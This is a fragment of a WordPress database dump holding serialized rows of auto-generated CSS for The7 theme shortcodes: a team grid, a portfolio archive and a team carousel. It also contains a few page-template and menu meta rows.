grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(9564,2580,'_wp_page_template','default'),
(9565,2580,'_dt_microsite_primary_menu',''),
(9566,2580,'_dt_microsite_split_left_menu',''),
(9567,2580,'_dt_microsite_split_right_menu',''),
(9568,2580,'_dt_microsite_mobile_menu',''),
(9569,2577,'the7_shortcodes_dynamic_css','a:2:{s:32:\"e4e66e4ff80458198f005e3b60ad2f96\";s:6921:\".team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a {\n  width: 36px;\n  height: 36px;\n  border-radius: 500px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a:before,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a:after {\n  border-width: 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a.owl-prev {\n  top: 50%;\n  transform: translateY(calc(-50% + 0px));\n  left: -43px;\n}\n@media all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a.owl-prev {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a.owl-prev i {\n  padding: 0px 0px 0px 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a.owl-next {\n  top: 50%;\n  transform: translateY(calc(-50% + 0px));\n  right: -43px;\n}\n@media all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a.owl-next {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a.owl-next i {\n  padding: 0px 0px 0px 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav i {\n  font-size: 18px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a:not(:hover) i,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a:not(:hover) i:before {\n  color: #ffffff;\n  background: none;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a:hover i,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.owl-carousel .owl-nav a:hover i:before {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .owl-dots {\n  top: calc(100% + 20px);\n  left: 50%;\n  transform: translateX(calc(-50% + 0px));\n}\n@media all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .owl-dots {\n    transform: translateX(-50%);\n    margin-left: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .owl-dot {\n  width: 10px;\n  height: 10px;\n  margin: 0 8px;\n}\n@media screen and (max-width: 778px) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.hide-arrows.owl-carousel .owl-nav a {\n    display: none;\n  }\n}\n@media screen and (max-width: 778px) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.reposition-arrows.owl-carousel .owl-nav .owl-prev {\n    top: 50%;\n    transform: translateY(calc(-50% + 0px));\n    left: 10px;\n  }\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.reposition-arrows.owl-carousel .owl-nav .owl-next {\n    top: 50%;\n    transform: translateY(calc(-50% + 0px));\n    right: 10px;\n  }\n}\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.reposition-arrows.owl-carousel .owl-nav .owl-prev {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96.reposition-arrows.owl-carousel .owl-nav .owl-next {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .team-author-name,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .team-content {\n  margin-bottom: 5px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96  .team-media,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96  .team-media a.rollover,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96  .team-media a.rollover *,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96  .team-media img {\n  border-radius: 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico {\n  margin-bottom: 15px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:before,\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-e4e66e4ff80458198f005e3b60ad2f96 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 